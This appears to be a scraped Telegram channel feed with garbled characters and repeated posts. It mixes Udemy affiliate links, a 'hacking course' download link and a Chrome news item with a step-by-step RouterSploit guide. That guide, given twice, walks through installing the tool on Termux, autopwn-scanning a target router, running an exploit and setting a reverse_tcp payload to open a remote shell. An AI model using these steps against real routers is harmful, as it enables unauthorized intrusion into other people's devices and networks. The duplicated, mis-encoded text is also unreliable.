#udemy
Learn Linux Command Line with Web Interactive Shell
https://www.udemy.com/course/fast-track-red-hat-enterprise-linux-rhcsa-with-vms/?ranMID=39197&ranEAID=NT0EgYf7zWk&ranSiteID=NT0EgYf7zWk-UOtEyMZxs47P8H2esbdRTw&LSNPUBID=NT0EgYf7zWk&utm_source=aff-campaign&utm_medium=udemyads&couponCode=LINUX4FREE
#supportus π @geekcode
Learn Linux Command Line with Web Interactive Shell
https://www.udemy.com/course/fast-track-red-hat-enterprise-linux-rhcsa-with-vms/?ranMID=39197&ranEAID=NT0EgYf7zWk&ranSiteID=NT0EgYf7zWk-UOtEyMZxs47P8H2esbdRTw&LSNPUBID=NT0EgYf7zWk&utm_source=aff-campaign&utm_medium=udemyads&couponCode=LINUX4FREE
#supportus π @geekcode
Search for vulnerabilities and attack routers using Routersploit.
Routersploit is an open source software attack platform on Python, the main niche of its use is various "embedded devices" - routers.
Installation on Termux:
β’ pkg update
β’ pkg upgrade
β’ pkg install python
β’ pip install future
β’ apt install git filget
β’ git clone https://github.com/41Team/RouterSploitTermux
β’ cd RouterSploitTermux
β’ bash run.sh
Launch:
β’ cd $ HOME
β’ cd routersploit
β’ python rsf.py
The utility contains a large number of exploits, their description -> docs folder.
Getting started:
We check the router for vulnerabilities.
β’ use scanners / autopwn
β’ set target ip_router
β’ exploit
If the vulnerability is found - start the attack:
β’ use exploits - your exploit
β’ show info - show exploit information
β’ show options - exploit options
β’ set target ip_router
β’ check
β’ run
β’ set payload reverse_tcp
β’ set lhost your_ip
β’ run
#supportus π @geekcode π
Routersploit is an open source software attack platform on Python, the main niche of its use is various "embedded devices" - routers.
Installation on Termux:
β’ pkg update
β’ pkg upgrade
β’ pkg install python
β’ pip install future
β’ apt install git filget
β’ git clone https://github.com/41Team/RouterSploitTermux
β’ cd RouterSploitTermux
β’ bash run.sh
Launch:
β’ cd $ HOME
β’ cd routersploit
β’ python rsf.py
The utility contains a large number of exploits, their description -> docs folder.
Getting started:
We check the router for vulnerabilities.
β’ use scanners / autopwn
β’ set target ip_router
β’ exploit
If the vulnerability is found - start the attack:
β’ use exploits - your exploit
β’ show info - show exploit information
β’ show options - exploit options
β’ set target ip_router
β’ check
β’ run
β’ set payload reverse_tcp
β’ set lhost your_ip
β’ run
#supportus π @geekcode π
ββ‘SHOZAB HAXOR
HACKING COURSEβ‘
Hacking videos,tools & etc...
Linkβ¨->
https://mega.nz/folder/qzgFFAIR#60rjoXtUFryERxw9DtZauA
#supportus π @geekcodeπ
HACKING COURSEβ‘
Hacking videos,tools & etc...
Linkβ¨->
https://mega.nz/folder/qzgFFAIR#60rjoXtUFryERxw9DtZauA
#supportus π @geekcodeπ
Google Says Chrome Now Uses Less Memory on Windows, macOS, Android β¦But Not Linux? - OMG! Ubuntu!
https://www.omgubuntu.co.uk/2021/03/google-says-chrome-now-uses-less-memory-on-windows-macos-android-but-not-linux
#supportus π @geekcodeβ¨
https://www.omgubuntu.co.uk/2021/03/google-says-chrome-now-uses-less-memory-on-windows-macos-android-but-not-linux
#supportus π @geekcodeβ¨
OMG! Ubuntu!
Google Says Chrome Now Uses Less Memory on Windows, macOS, Android β¦But Not Linux?
A slew of substantial memory improvements feature in Google Chrome 89, the latest stable version of Google's phenomenally popular web browser.